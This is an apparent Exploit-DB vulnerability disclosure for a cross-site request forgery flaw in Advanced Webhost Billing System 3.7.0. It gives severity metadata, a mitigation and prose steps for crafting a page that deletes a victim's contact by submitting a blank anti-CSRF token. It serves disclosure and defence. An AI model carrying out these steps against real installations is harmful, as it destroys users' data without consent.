Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)

vendor:

Advanced Webhost Billing System

by:

Rahul Ramakant Singh

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Advanced Webhost Billing System

Affected Version From: 3.7.0

Affected Version To: 3.7.0

Patch Exists: NO

Related CWE: N/A

CPE: a:awbs:advanced_webhost_billing_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2021

Advanced Webhost Billing System 3.7.0 – Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Advanced Webhost Billing System 3.7.0. An attacker can craft a malicious page with an action to delete a contact and blank the token value from the page. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request. This allows the attacker to delete the contact.

Mitigation:

Implementing a strong anti-CSRF token and validating the token on the server-side can help mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
# Date: 06/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://www.awbs.com/
# Version: 3.7.0
# Tested on Windows

Steps:

1. Login into the application with the help of email and password.
2. Navigate to my additional contact page and add one contact for the same
3. Now there is option for delete the contact from the list.
4. Now Logout from the application and same create a one CSRF POC having having action of delete contact and same blank the token value from CSRF POC.
5. Now again login into the application and Send a link of this crafted page(generated CSRF POC) to the victim.
6. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request.
7. Contact successfully deleted.